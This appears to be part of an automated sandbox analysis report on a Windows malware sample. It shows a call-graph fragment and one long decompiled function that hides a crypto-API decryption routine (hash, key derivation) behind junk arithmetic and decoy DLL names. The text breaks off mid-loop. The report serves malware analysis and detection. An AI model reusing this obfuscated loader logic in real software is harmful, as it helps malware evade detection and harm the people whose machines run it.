21392->21289 21394 407268 GetTickCount 21393->21394 21395 40725d 21393->21395 21394->21293 21395->21293 21397 409da2 SysAllocStringLen 21396->21397 21398 409db8 21396->21398 21397->21398 21399 409c78 21397->21399 21398->21312 21400 409cf4 21399->21400 21401 409ce6 SysFreeString 21399->21401 21400->21312 21401->21400 21403 409c78 21402->21403 21404 409e58 SysAllocStringLen 21402->21404 21405 409cf4 21403->21405 21406 409ce6 SysFreeString 21403->21406 21404->21403 21407 409e69 SysFreeString 21404->21407 21405->21328 21406->21405 21407->21328 21409 87142c 21408->21409 21421 40a884 21409->21421 21411 8715d5 21412 8716d4 GetShortPathNameW 21411->21412 21415 8716e9 21412->21415 21413 871fea 21414 40a884 3 API calls 21413->21414 21419 871ff5 21414->21419 21415->21413 21416 40a884 3 API calls 21415->21416 21417 871d92 21416->21417 21418 871fe0 GetShortPathNameW 21417->21418 21418->21413 21419->21330 21420->21332 21422 40a891 21421->21422 21426 40a898 21421->21426 21430 409c78 SysAllocStringLen SysFreeString 21422->21430 21427 40a63c 21426->21427 21428 40a642 SysFreeString 21427->21428 21429 40a648 21427->21429 21428->21429 21429->21411 21430->21426 21432 405d01 21431->21432 21433 405de4 21431->21433 21436 405d07 21432->21436 21438 405d7e Sleep 21432->21438 21434 405778 21433->21434 21433->21436 21437 405ede 21434->21437 21439 4056c8 2 API calls 21434->21439 21435 405d10 21435->21344 21436->21435 21441 405dc2 Sleep 21436->21441 21448 405df9 21436->21448 21437->21344 21438->21436 21440 405d98 Sleep 21438->21440 21442 405789 21439->21442 21440->21432 21443 405dd8 Sleep 21441->21443 21441->21448 21444 4057b9 21442->21444 21445 40579f VirtualFree 21442->21445 21443->21436 21446 4057b0 21444->21446 21447 4057c2 VirtualQuery VirtualFree 21444->21447 21445->21446 21446->21344 21447->21444 21447->21446 21449 405e78 VirtualFree 21448->21449 21450 405e1c 21448->21450 21449->21344 21450->21344 21452 40966c 21451->21452 21453 409637 21451->21453 21452->21217 21453->21452 21454 409666 KiUserCallbackDispatcher 21453->21454 21454->21453 21455->21213 21456 878832 48 API calls 21464 4061fc 10 API calls

      Executed Functions

      Function 00881940 Relevance: 107.2, APIs: 7, Strings: 53, Instructions: 2165COMMONCrypto
      Download Yara Rule
      C-Code - Quality: 77%
      			E00881940(intOrPtr* __eax, void* __ebx, char __edx, void* __edi, void* __esi) {
				intOrPtr* _v8;
				char _v12;
				char _v13;
				long* _v20;
				long* _v24;
				char _v28;
				int _v32;
				char _v36;
				char _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				char _v84;
				signed int _v88;
				signed int _v92;
				void* _v93;
				void* _v94;
				char _v95;
				char _v96;
				char _v97;
				char _v98;
				char _v99;
				char _v100;
				signed int _v104;
				char _v105;
				char _v106;
				char _v107;
				char _v108;
				char _v109;
				char _v110;
				char _v111;
				char _v112;
				char _v113;
				intOrPtr _v120;
				signed int _v124;
				char _v125;
				char _v126;
				char _v127;
				char _v128;
				intOrPtr _v132;
				char _v137;
				char _v138;
				char _v139;
				char _v140;
				char _v141;
				char _v148;
				char _v149;
				char _v150;
				char _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				intOrPtr _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				intOrPtr _v184;
				intOrPtr _v188;
				intOrPtr _v192;
				intOrPtr _v196;
				intOrPtr _v200;
				intOrPtr _v204;
				intOrPtr _v208;
				intOrPtr _v212;
				intOrPtr _v216;
				char _v220;
				intOrPtr _v224;
				intOrPtr _v228;
				intOrPtr _v232;
				intOrPtr _v236;
				intOrPtr _v240;
				intOrPtr _v244;
				intOrPtr _v248;
				char _v252;
				char _v256;
				char _v260;
				char _v264;
				char _v268;
				char _v272;
				intOrPtr _v276;
				intOrPtr _v280;
				intOrPtr _v284;
				intOrPtr _v288;
				intOrPtr _v292;
				intOrPtr _v296;
				intOrPtr _v300;
				intOrPtr _v304;
				char _v308;
				char _v312;
				char _v316;
				intOrPtr _v320;
				intOrPtr _v324;
				intOrPtr _v328;
				intOrPtr _v332;
				intOrPtr _v336;
				intOrPtr _v340;
				intOrPtr _v344;
				intOrPtr _v348;
				intOrPtr _v352;
				char _v356;
				intOrPtr _v360;
				intOrPtr _v364;
				intOrPtr _v368;
				intOrPtr _v372;
				intOrPtr _v376;
				intOrPtr _v380;
				intOrPtr _v384;
				intOrPtr _v388;
				intOrPtr _v392;
				intOrPtr _v396;
				intOrPtr _v400;
				intOrPtr _v404;
				intOrPtr _v408;
				intOrPtr _v412;
				intOrPtr _v416;
				intOrPtr _v420;
				intOrPtr _v424;
				intOrPtr _v428;
				intOrPtr _v432;
				intOrPtr _v436;
				intOrPtr _v440;
				intOrPtr _v444;
				intOrPtr _v448;
				intOrPtr _v452;
				intOrPtr _v456;
				intOrPtr _v460;
				intOrPtr _v464;
				intOrPtr _v468;
				intOrPtr _v472;
				intOrPtr _v476;
				intOrPtr _v480;
				intOrPtr _v484;
				intOrPtr _v488;
				char _v492;
				char _v500;
				char _v508;
				char _v516;
				char _v524;
				char _v536;
				char _v548;
				char _v560;
				char _v564;
				intOrPtr _v684;
				intOrPtr _v688;
				intOrPtr _v692;
				intOrPtr _v696;
				char _v700;
				char _v704;
				char _v708;
				char _v712;
				intOrPtr _v716;
				intOrPtr _v720;
				char _v724;
				char _v728;
				char _v736;
				char _v1348;
				int _t1022;
				signed int _t1029;
				signed int _t1031;
				signed int _t1074;
				intOrPtr _t1075;
				intOrPtr _t1084;
				signed int _t1085;
				intOrPtr _t1133;
				intOrPtr* _t1182;
				intOrPtr* _t1187;
				intOrPtr* _t1192;
				intOrPtr* _t1197;
				intOrPtr* _t1218;
				intOrPtr* _t1223;
				intOrPtr* _t1228;
				signed int _t1262;
				signed int _t1266;
				signed int _t1271;
				signed int _t1273;
				signed int _t1275;
				intOrPtr _t1277;
				intOrPtr _t1280;
				signed int _t1287;
				void* _t1293;
				intOrPtr _t1324;
				intOrPtr _t1330;
				intOrPtr _t1356;
				intOrPtr _t1382;
				intOrPtr _t1390;
				signed int _t1391;
				signed int _t1392;
				signed int _t1401;
				intOrPtr _t1403;
				signed int _t1406;
				char* _t1443;
				char* _t1446;
				char* _t1451;
				char* _t1456;
				char* _t1461;
				char* _t1466;
				char* _t1475;
				char* _t1480;
				char* _t1485;
				signed int _t1512;
				intOrPtr _t1545;
				signed int _t1549;
				intOrPtr* _t1555;
				intOrPtr* _t1560;
				intOrPtr* _t1565;
				intOrPtr* _t1570;
				signed int _t1653;
				intOrPtr _t1658;
				signed int _t1667;
				signed int _t1675;
				intOrPtr _t1680;
				signed int _t1696;
				signed int _t1732;
				intOrPtr _t1735;
				intOrPtr _t1737;
				intOrPtr* _t1753;
				intOrPtr* _t1758;
				intOrPtr* _t1763;
				intOrPtr* _t1768;
				intOrPtr* _t1773;
				intOrPtr* _t1778;
				intOrPtr* _t1783;
				intOrPtr* _t1788;
				intOrPtr* _t1793;
				signed int _t1877;
				intOrPtr _t1879;
				intOrPtr _t1881;
				intOrPtr _t1884;
				intOrPtr _t1886;
				intOrPtr _t1893;
				intOrPtr _t1895;
				intOrPtr _t1909;
				intOrPtr _t1911;
				signed int _t1912;
				signed int _t1913;
				signed int _t1915;
				intOrPtr* _t1929;
				intOrPtr* _t1934;
				intOrPtr* _t1939;
				intOrPtr* _t1944;
				intOrPtr* _t2013;
				intOrPtr* _t2018;
				char* _t2023;
				char* _t2026;
				void* _t2054;
				intOrPtr _t2202;
				intOrPtr _t2203;
				intOrPtr _t2216;
				intOrPtr _t2218;
				intOrPtr _t2237;
				intOrPtr _t2252;
				intOrPtr _t2267;
				intOrPtr _t2284;
				intOrPtr _t2285;
				intOrPtr* _t2302;
				intOrPtr* _t2305;
				intOrPtr* _t2309;
				intOrPtr* _t2313;
				intOrPtr* _t2317;
				intOrPtr* _t2321;
				intOrPtr* _t2327;
				intOrPtr* _t2331;
				intOrPtr* _t2335;
				signed int _t2430;
				intOrPtr _t2471;
				intOrPtr* _t2536;
				intOrPtr* _t2539;
				intOrPtr _t2564;
				intOrPtr _t2565;
				char _t2583;
				int _t2584;
				void* _t2602;
				void* _t2603;
				char _t2627;

				_t2562 = __esi;
				_t2561 = __edi;
				_t2053 = __ebx;
				_t2564 = _t2565;
				_t2054 = 0xa8;
				do {
					_push(0);
					_push(0);
					_t2054 = _t2054 - 1;
				} while (_t2054 != 0);
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v12 = __edx;
				_v8 = __eax;
				E00409D8C(_v12);
				_push(_t2564);
				_push(0x8852e2);
				_push( *[fs:eax]);
				 *[fs:eax] = _t2565;
				_v13 = 0;
				_push(_t2564);
				_push(0x884f29);
				_push( *[fs:eax]);
				 *[fs:eax] = _t2565;
				E0040A0C0( &_v36, _v40);
				_v64 = _v56 + 0xe7;
				_v80 = 0;
				if(_v80 < 8) {
					_t1929 =  *0x8a9d58; // 0x8b0913
					_v95 =  *_t1929;
					if(_v95 + 0x9f - 0x1a < 0) {
						_v95 = _v95 - 0x20;
					}
					_t1934 =  *0x8a9cf4; // 0x8b0911
					_v96 =  *_t1934;
					if(_v96 + 0x9f - 0x1a < 0) {
						_v96 = _v96 - 0x20;
					}
					_t1939 =  *0x8a9f14; // 0x8b0922
					_v97 =  *_t1939;
					if(_v97 + 0x9f - 0x1a < 0) {
						_v97 = _v97 - 0x20;
					}
					_t1944 =  *0x8a9ce4; // 0x8b0912
					_v98 =  *_t1944;
					if(_v98 + 0x9f - 0x1a < 0) {
						_v98 = _v98 - 0x20;
					}
					E0040A3C0(0);
					_push(_v164);
					E0040A3C0(0);
					_push(_v168);
					E0040A3C0(0);
					_push(_v172);
					E0040A3C0(0);
					_push(_v176);
					E0040A3C0(0);
					_push(_v180);
					E0040A3C0(0);
					_push(_v184);
					E0040A3C0(0);
					_push(_v188);
					E0040A3C0(0);
					_push(_v192);
					E0040A3C0(0);
					_push(_v196);
					E0040A3C0(0);
					_push(_v200);
					E0040A3C0(0);
					_push(_v204);
					E0040A3C0(0);
					_push(_v208);
					E0040A3C0(0);
					_push(_v212);
					E0040A3C0(0);
					_push(_v216);
					E0040A3C0(0);
					_push(_v220);
					E0040A3C0(0);
					_push(_v224);
					E0040A3C0(0);
					_push(_v228);
					E0040A3C0(0);
					_push(_v232);
					E0040A3C0(0);
					_push(_v236);
					E0040A3C0(0);
					_push(_v240);
					E0040A3C0(0);
					_push(_v244);
					E0040A3C0(0);
					_push(_v248);
					E0040A3C0(0);
					E0040A494( &_v160, _t2053, 0x17, _t2561, _t2562);
					E0040A9E8( &_v36, _v160, _v252);
					_v84 = 0;
					_v92 = _v48 + _v48 + (_v48 + _v48) * 4;
					_v88 = _v76 + 0xda;
					E0040A0C0( &_v40, _v40);
					E0040A0C0( &_v36, L"System.IO.dll");
					E0040A0C0( &_v36, _v40);
					E0040A0C0( &_v36, _v40);
					_t2013 =  *0x8a9d58; // 0x8b0913
					_v99 =  *_t2013;
					if(_v99 + 0x9f - 0x1a < 0) {
						_v99 = _v99 - 0x20;
					}
					_t2018 =  *0x8a9c3c; // 0x8b0918
					_v100 =  *_t2018;
					if(_v100 + 0x9f - 0x1a < 0) {
						_t112 =  &_v100;
						 *_t112 = _v100 - 0x20;
						_t2583 =  *_t112;
					}
					_t2023 =  &_v264;
					_t2536 =  *0x8a9ce4; // 0x8b0912
					 *((char*)(_t2023 + 1)) =  *_t2536;
					 *_t2023 = 1;
					E0040A324( &_v268,  &_v264);
					_t2026 =  &_v272;
					_t2539 =  *0x8aa0b4; // 0x8b091f
					 *((char*)(_t2026 + 1)) =  *_t2539;
					 *_t2026 = 1;
					E0040A34C( &_v268, 2,  &_v272);
					E0040A444( &_v260, 0,  &_v268, _t2583);
					_push(_v260);
					E0040A3C0(0);
					_push(_v276);
					E0040A3C0(0);
					_push(_v280);
					E0040A3C0(0);
					_push(_v284);
					E0040A3C0(0);
					_push(_v288);
					E0040A3C0(0);
					_push(_v292);
					E0040A3C0(0);
					_push(_v296);
					_push(0x88532c);
					E0040A3C0(0);
					_push(_v300);
					E0040A3C0(0);
					_push(_v304);
					E0040A3C0(0);
					E0040A494( &_v256, _t2053, 0xb, _t2561, _t2562);
					E0040A9E8( &_v36, _v256, _v308);
				}
				E0040A0C0( &_v40, _v40);
				E0040ACEC(_v40, 1, 1,  &_v40);
				E0040ACEC(_v36, 0, 1,  &_v40);
				_t1022 = CryptAcquireContextA( &_v20, 0, 0, 0x18, 0xf0000000); // executed
				_t2584 = _t1022;
				if(_t2584 == 0) {
					__eflags = 0;
					_v88 = 0;
					do {
						_v84 = 0;
						__eflags = _v84 - 6;
						while(_v84 < 6) {
							_v84 = _v84 + 1;
							_v44 = _v60 * 0x69;
							_v52 = _v48 + _v56;
							_v68 = 0x2c - _v64;
							 *0x8a9b40 =  *0x8a9af4 * 0x44;
							 *0x8a9a40 = 0x73 -  *0x8a9a98;
							asm("fild dword [0x8a9b18]");
							 *0x8a9b24 = E004076E8();
							__eflags = _v84 - 6;
						}
						_v88 = _v88 + 1;
						__eflags = _v88 - 1;
					} while (_v88 != 1);
					E0040A0C0( &_v36, _v36);
					 *0x8a9b08 = 0;
					E008764FC(_t2053, _t2561, _t2562);
					_t1029 =  *0x8a9ad4; // 0xba811226
					 *0x8a9ad4 = E00407278(_t1029);
					_t1031 =  *0x8a9b28; // 0xfbe6deff
					 *0x8a9b30 = _t1031 *  *0x8a9abc;
					E0040A0C0( &_v36, L"CustomMarshalers.dll");
					_pop(_t2202);
					 *[fs:eax] = _t2202;
					__eflags = 0;
					_pop(_t2203);
					 *[fs:eax] = _t2203;
					_push(E008852EC);
					E00409D28( &_v1348, 0xd);
					E00409D28( &_v736, 2);
					E00409C98( &_v728);
					E00409D28( &_v724, 0xb);
					E00409C98( &_v564);
					E00409D28( &_v492, 0x2d);
					E00409D28( &_v308, 9);
					E00409D28( &_v260, 2);
					E00409D28( &_v220, 0x10);
					E00409D28( &_v252, 8);
					E00409CBC( &_v148);
					E00409CF8( &_v40, 2);
					return E00409CBC( &_v12);
				} else {
					E0040ACB4(_v40, L"System.Configuration.Install.ni.dll");
					if(_t2584 != 0) {
						_t1074 =  *0x8a9a28; // 0x0
						_v104 = _t1074;
						__eflags = _v104;
						if(_v104 != 0) {
							_t1915 = _v104 - 4;
							__eflags = _t1915;
							_v104 =  *_t1915;
						}
						__eflags = _v104 - 0x11;
						if(_v104 == 0x11) {
							_v312 = _v76 + 0xd2;
							asm("fild dword [ebp-0x134]");
							_v48 = E004076E8();
							_v60 = _v52 * _v68;
							_v72 = _v92 * _v80;
							_t1909 =  *0x8a9b1c; // 0xfbe7a61a
							 *0x8a9b90 = _t1909 +  *0x8a9ac0;
							_t1911 =  *0x8a99e4; // 0x7c5162fc
							_t1912 = _t1911 - 0x45;
							__eflags = _t1912;
							 *0x8a9a70 = _t1912;
							_t1913 =  *0x8a9b78; // 0x12d6c
							 *0x8a9ad4 = _t1913;
						}
					} else {
						_v56 = 0;
						E008764FC(_t2053, _t2561, _t2562);
					}
					_t1075 =  *0x8a9a64; // 0xfcfc377e
					 *0x8a9bc0 = _t1075 +  *0x8a9a8c;
					E0040A0C0( &_v36, _v40);
					E0040A0C0( &_v36, _v36);
					_v64 = 0;
					_t2585 = _v64 - 3;
					while(_v64 < 3) {
						_v64 = _v64 + 1;
						 *0x8a9a88 = 0;
						E0087301C(_v56, _t2053, _v52, _v44, _t2585, _v64);
					}
					if(_v72 + _v64 <= _v64) {
						_t1084 =  *0x8a9a6c; // 0xfbe7a61a
						_t1085 = _t1084 - 0x24;
						__eflags = _t1085;
						 *0x8a9a8c = _t1085;
					} else {
						if(E0040AEFC(L"RtlDelete", 1, _v40) - 1 >= 0) {
							_t1877 =  *0x8a9a9c; // 0xa3011753
							 *0x8a9abc = _t1877 + 0xb3;
							_t1879 =  *0x8a9b24; // 0xfbe6de1a
							 *0x8a9b3c = _t1879 + 0xaf;
							_t1881 =  *0x8a9b88; // 0x2c903efa
							 *0x8a9bb0 = _t1881 + 0xac;
							 *0x8a9a9c =  *0x8a9a70 * 0xa9;
							_t1884 =  *0x8a9b38; // 0xfcbf7485
							 *0x8a9b1c = _t1884 - 0x40;
							_t1886 =  *0x8a9a58; // 0x4192234
							 *0x8a9b7c = _t1886 + 4;
						} else {
							asm("fild dword [0x8a9b84]");
							 *0x8a9a78 = E004076F4();
							 *0x8a9aec = E008A9B04 * 0xc6;
							 *0x8a9b64 =  *0x8a9b70 * 0xc3;
							 *0x8a99e4 = 0xf4 -  *0x8a9ae4;
							_t1893 =  *0x8a9b94; // 0x74d3d361
							 *0x8a9aa4 = _t1893 + 0x8a;
							_t1895 =  *0x8a9ac8; // 0x6009aad3
							_v312 = _t1895 + 0x21;
							asm("fild dword [ebp-0x134]");
							 *0x8a9b24 = E004076E8();
						}
					}
					_push(_t2564);
					_push(0x884b2e);
					_push( *[fs:eax]);
					 *[fs:eax] = _t2565;
					_v80 = 0;
					while(_v80 < 0xc) {
						_v80 = _v80 + 1;
						_v60 = _v56 - _v64;
						_t2590 = _v80 - 0xc;
					}
					 *0x8a9b88 = 0;
					_t2216 =  *0x8a9aa4; // 0x58cb7cf7
					E0087FA9C(_v56, _t2216, _t2590);
					_v72 = _v84;
					_v48 = _v52 + 0xc3;
					_v76 = _v44 - _v92;
					E0040A0C0( &_v36, _v40);
					_push( &_v28);
					_push(0);
					_push(0);
					_push(0x8003);
					_push(_v20);
					if( *0x8b124c() == 0) {
						_pop(_t2218);
						 *[fs:eax] = _t2218;
						_push(E00884B38);
						CryptReleaseContext(_v20, 0);
						E0040ACEC(_v36, 0, 1,  &_v36);
						_v72 = _v84 + 0x24;
						_v80 = 0;
						__eflags = _v80 - 3;
						while(_v80 < 3) {
							_v80 = _v80 + 1;
							_v56 = 0;
							__eflags = _v56 - 0xb;
							while(_v56 < 0xb) {
								_v56 = _v56 + 1;
								_v44 = _v52 + 0x9a;
								E0040A0C0( &_v36, _v36);
								E0040ACEC(_v40, 1, 1,  &_v36);
								_v68 = _v76 + _v76 * 8 + (_v76 + _v76 * 8) * 8;
								E0040A0C0( &_v40, _v36);
								E0040A0C0( &_v36, _v40);
								__eflags = _v56 - 0xb;
							}
							__eflags = _v80 - 3;
						}
						E0040A0C0( &_v40, _v36);
						E0040A0C0( &_v36, _v40);
						__eflags = 0;
						return E0040ACEC(_v36, 0, 1,  &_v40);
					} else {
						_push(_t2564);
						_push(0x88495d);
						_push( *[fs:eax]);
						 *[fs:eax] = _t2565;
						_t1133 =  *0x8a99d4; // 0x0
						E0040ACB4(_t1133, L"OleCreateFromDataEx");
						if(0 != 0) {
							__eflags = _v76 - _v80 - _v76;
							if(_v76 - _v80 < _v76) {
								_t1753 =  *0x8aa1dc; // 0x8b0921
								_v105 =  *_t1753;
								__eflags = _v105 + 0x9f - 0x1a;
								if(_v105 + 0x9f - 0x1a < 0) {
									_t262 =  &_v105;
									 *_t262 = _v105 - 0x20;
									__eflags =  *_t262;
								}
								_t1758 =  *0x8a9fcc; // 0x8b0927
								_v106 =  *_t1758;
								__eflags = _v106 + 0x9f - 0x1a;
								if(_v106 + 0x9f - 0x1a < 0) {
									_t266 =  &_v106;
									 *_t266 = _v106 - 0x20;
									__eflags =  *_t266;
								}
								_t1763 =  *0x8aa15c; // 0x8b091c
								_v107 =  *_t1763;
								__eflags = _v107 + 0x9f - 0x1a;
								if(_v107 + 0x9f - 0x1a < 0) {
									_t270 =  &_v107;
									 *_t270 = _v107 - 0x20;
									__eflags =  *_t270;
								}
								_t1768 =  *0x8aa1dc; // 0x8b0921
								_v108 =  *_t1768;
								__eflags = _v108 + 0x9f - 0x1a;
								if(_v108 + 0x9f - 0x1a < 0) {
									_t274 =  &_v108;
									 *_t274 = _v108 - 0x20;
									__eflags =  *_t274;
								}
								_t1773 =  *0x8a9ffc; // 0x8b091a
								_v109 =  *_t1773;
								__eflags = _v109 + 0x9f - 0x1a;
								if(_v109 + 0x9f - 0x1a < 0) {
									_t278 =  &_v109;
									 *_t278 = _v109 - 0x20;
									__eflags =  *_t278;
								}
								_t1778 =  *0x8a9e60; // 0x8b0923
								_v110 =  *_t1778;
								__eflags = _v110 + 0x9f - 0x1a;
								if(_v110 + 0x9f - 0x1a < 0) {
									_t282 =  &_v110;
									 *_t282 = _v110 - 0x20;
									__eflags =  *_t282;
								}
								_t1783 =  *0x8aa15c; // 0x8b091c
								_v111 =  *_t1783;
								__eflags = _v111 + 0x9f - 0x1a;
								if(_v111 + 0x9f - 0x1a < 0) {
									_t286 =  &_v111;
									 *_t286 = _v111 - 0x20;
									__eflags =  *_t286;
								}
								_t1788 =  *0x8a9f14; // 0x8b0922
								_v112 =  *_t1788;
								__eflags = _v112 + 0x9f - 0x1a;
								if(_v112 + 0x9f - 0x1a < 0) {
									_t290 =  &_v112;
									 *_t290 = _v112 - 0x20;
									__eflags =  *_t290;
								}
								_t1793 =  *0x8a9f14; // 0x8b0922
								_v113 =  *_t1793;
								__eflags = _v113 + 0x9f - 0x1a;
								if(_v113 + 0x9f - 0x1a < 0) {
									_t294 =  &_v113;
									 *_t294 = _v113 - 0x20;
									__eflags =  *_t294;
								}
								E0040A3C0(0);
								_push(_v320);
								E0040A3C0(0);
								_push(_v324);
								E0040A3C0(0);
								_push(_v328);
								E0040A3C0(0);
								_push(_v332);
								E0040A3C0(0);
								_push(_v336);
								E0040A3C0(0);
								_push(_v340);
								_push(0x88532c);
								E0040A3C0(0);
								_push(_v344);
								E0040A3C0(0);
								_push(_v348);
								E0040A3C0(0);
								E0040A494( &_v316, _t2053, 0xa, _t2561, _t2562);
								E0040A9E8( &_v40, _v316, _v352);
								E0040A0C0( &_v36, _v36);
								E0040A0C0( &_v40, _v36);
								E0040A0C0( &_v36, _v36);
								E0040ACEC(_v40, 1, 1,  &_v36);
								E0040A0C0( &_v40, _v36);
							}
						} else {
							if(_v60 - _v64 == _v76) {
								asm("fild dword [ebp-0x3c]");
								_v88 = E004076E8();
								_v48 = _v68 * 0xe2;
								_v56 = _v84 - 0xd6;
								_v72 = _v76 - _v60;
								E0040A0C0( &_v40, _v36);
								E0040A0C0( &_v36, _v36);
							}
							_t2471 =  *0x8a99d4; // 0x0
							if(E0040AEFC(L"Api-ms-win-downlevel-advapi32-l1-1-1.dll", 1, _t2471) >= 0x7e) {
								E0040A0C0( &_v40, _v36);
								E0040A0C0( &_v40, L"oleacchooks.dll");
								E0040A0C0( &_v36, _v36);
								E0040A0C0( &_v36, _v40);
								E0040A0C0( &_v40, _v36);
								E0040ACEC(_v36, 0, 1,  &_v40);
							} else {
								E0040ACEC(_v40, 1, 1,  &_v36);
								E0040A0C0( &_v36, _v36);
								E0040A0C0( &_v40, _v40);
								E0040ACEC(_v36, 0, 1,  &_v40);
								E0040A0C0( &_v36, _v36);
								E0040A0C0( &_v40, _v36);
							}
						}
						if(_v76 - _v44 >= _v76) {
							E0040A0C0( &_v36, _v36);
							E0040A0C0( &_v36, _v40);
							E0040A0C0( &_v36, L"NlsData0047.dll");
						} else {
							E0040A0C0( &_v36, _v36);
							E0040A0C0( &_v40, _v40);
							E0040A0C0( &_v40, _v36);
							E0040A0C0( &_v36, L"SensorsApi.dll");
						}
						E0040A0C0( &_v36, _v40);
						E0040A0C0( &_v36, _v36);
						E0040A0C0( &_v36, _v40);
						E0040A0C0( &_v36, _v36);
						_v120 = _v12;
						if(_v120 != 0) {
							_v120 =  *((intOrPtr*)(_v120 - 4));
						}
						_push(0);
						_push(_v120);
						_push(_v12);
						_push(_v28);
						if( *0x8b1250() == 0) {
							L136:
							E0040A0C0( &_v36, _v36);
							_v60 = _v80 + _v72;
							asm("fild dword [ebp-0x40]");
							_v64 = E004076E8();
							_v92 = _v76;
							_v88 = _v84 + _v56;
							E0040A0C0( &_v40, _v36);
							_pop(_t2237);
							 *[fs:eax] = _t2237;
							_push(E00884967);
							_v68 = _v92 + 0xe6;
							_v72 = _v88 + 0xd8;
							_v84 = 0x60 - _v48;
							_v52 = _v56 - _v80;
							__eflags = _v76 - _v68 - _v76;
							if(_v76 - _v68 >= _v76) {
								E0040A0C0( &_v36, L"FXSCOVER.exe");
							} else {
								__eflags = _v72 + 0xc2 - _v64;
								if(_v72 + 0xc2 < _v64) {
									E0040ACEC(_v40, 1, 1,  &_v40);
									E0040A0C0( &_v36, _v36);
									E0040A0C0( &_v36, _v36);
									E0040A0C0( &_v36, _v40);
									E0040A0C0( &_v40, _v36);
									E0040A0C0( &_v40, L"RtlUnicodeStringToOemSize");
								}
							}
							_push(_t2564);
							_push(0x883f65);
							_push( *[fs:eax]);
							 *[fs:eax] = _t2565;
							_t1182 =  *0x8a9f40; // 0x8b0925
							_v137 =  *_t1182;
							__eflags = _v137 + 0x9f - 0x1a;
							if(_v137 + 0x9f - 0x1a < 0) {
								_t871 =  &_v137;
								 *_t871 = _v137 - 0x20;
								__eflags =  *_t871;
							}
							_t1187 =  *0x8aa0b8; // 0x8b0928
							_v138 =  *_t1187;
							__eflags = _v138 + 0x9f - 0x1a;
							if(_v138 + 0x9f - 0x1a < 0) {
								_t875 =  &_v138;
								 *_t875 = _v138 - 0x20;
								__eflags =  *_t875;
							}
							_t1192 =  *0x8aa0b4; // 0x8b091f
							_v139 =  *_t1192;
							__eflags = _v139 + 0x9f - 0x1a;
							if(_v139 + 0x9f - 0x1a < 0) {
								_t879 =  &_v139;
								 *_t879 = _v139 - 0x20;
								__eflags =  *_t879;
							}
							_t1197 =  *0x8a9f14; // 0x8b0922
							_v140 =  *_t1197;
							__eflags = _v140 + 0x9f - 0x1a;
							if(__eflags < 0) {
								_t883 =  &_v140;
								 *_t883 = _v140 - 0x20;
								__eflags =  *_t883;
							}
							E0040A3C0(0);
							_push(_v684);
							E0040A3C0(0);
							_push(_v688);
							E0040A3C0(0);
							_push(_v692);
							E0040A3C0(0);
							_push(_v696);
							E006BA5A8(6,  &_v700, __eflags);
							_push(_v700);
							E006BA5A8(0,  &_v704, __eflags);
							_push(_v704);
							E006BA5A8(0,  &_v708, __eflags);
							_push(_v708);
							_push(0x88532c);
							E0040A494( &_v148, _t2053, 8, _t2561, _t2562);
							_t1218 =  *0x8aa15c; // 0x8b091c
							_v141 =  *_t1218;
							__eflags = _v141 + 0x9f - 0x1a;
							if(_v141 + 0x9f - 0x1a < 0) {
								_t906 =  &_v141;
								 *_t906 = _v141 - 0x20;
								__eflags =  *_t906;
							}
							_t1223 =  *0x8a9f14; // 0x8b0922
							_v149 =  *_t1223;
							__eflags = _v149 + 0x9f - 0x1a;
							if(_v149 + 0x9f - 0x1a < 0) {
								_t910 =  &_v149;
								 *_t910 = _v149 - 0x20;
								__eflags =  *_t910;
							}
							_t1228 =  *0x8a9f14; // 0x8b0922
							_v150 =  *_t1228;
							__eflags = _v150 + 0x9f - 0x1a;
							if(_v150 + 0x9f - 0x1a < 0) {
								_t914 =  &_v150;
								 *_t914 = _v150 - 0x20;
								__eflags =  *_t914;
							}
							_push(_v148);
							E0040A3C0(0);
							_push(_v716);
							E0040A3C0(0);
							_push(_v720);
							E0040A3C0(0);
							E0040A494( &_v712, _t2053, 4, _t2561, _t2562);
							E0040A9E8( &_v36, _v712, _v724);
							__eflags = 0;
							_pop(_t2252);
							 *[fs:eax] = _t2252;
							_push(E00883F6C);
							return E00409CBC( &_v148);
						} else {
							_v80 = 0;
							while(_v80 < 9) {
								_v80 = _v80 + 1;
								_v312 = _v88 + 0xb7;
								asm("fild dword [ebp-0x134]");
								_v60 = E004076E8();
							}
							_t1262 =  *0x8a9abc; // 0x11dcea12
							 *0x8a9abc = E00407278(_t1262);
							_v68 = 0xe0 - _v92;
							_t1266 =  *0x8a9b54; // 0xfcfc377e
							_t2602 = _t1266 + 0xf8 -  *0x8a9a84; // 0x87862ac7
							if(_t2602 >= 0) {
								__eflags = 0;
								_v76 = 0;
								do {
									_v44 = _v84 + _v48;
									_t1271 =  *0x8a9b98; // 0xbc98d55c
									 *0x8a9ac4 = _t1271 + 0xa2;
									_t1273 =  *0x8a9b4c; // 0x4d1a0eb9
									 *0x8a9b64 = _t1273 *  *0x8a9a70;
									_t1275 =  *0x8a9af4; // 0xc0b2beda
									 *0x8a9a70 = _t1275 +  *0x8a9b30;
									_t1277 =  *0x8a9a50; // 0x3408bc9
									 *0x8a9b30 = _t1277 +  *0x8a9ad4;
									 *0x8a9a3c =  *0x8a9b50 * 0x2a;
									_v76 = _v76 + 1;
									__eflags = _v76 - 5;
								} while (_v76 != 5);
							} else {
								_t1737 =  *0x8a9af0; // 0xd11327ee
								 *0x8a9af0 = E00407278(_t1737);
							}
							_t1280 =  *0x8a9a84; // 0x87862ac7
							_t2603 = _t1280 -  *0x8a9a8c -  *0x8a9b54; // 0xfcfc377e
							if(_t2603 != 0) {
								__eflags = 0;
								 *0x8a9ba8 = 0;
								_push(0x8a9adc);
								_push( &_v84);
								E00881594(0x8a9a34, _t2053,  &_v52, 0x8a9bb0,  &_v84, 0x8a9b74);
							} else {
								_t1735 =  *0x8a9b18; // 0x194
								 *0x8a9ab4 = _t1735 + 4;
							}
							_t1287 =  *0x8a9b28; // 0xfbe6deff
							_v312 = _t1287 + 0x2d;
							asm("fild dword [ebp-0x134]");
							 *0x8a9b40 = E004076E8();
							_t1293 =  *0x8b1254(_v20, 0x6610, _v28, 0,  &_v24); // executed
							if(_t1293 == 0) {
								goto L136;
							} else {
								_push(_t2564);
								_push(0x883593);
								_push( *[fs:eax]);
								 *[fs:eax] = _t2565;
								E0040A0C0( &_v36, _v40);
								_v88 = 0;
								do {
									_v312 = _v44 + 0x61;
									asm("fild dword [ebp-0x134]");
									_v72 = E004076E8();
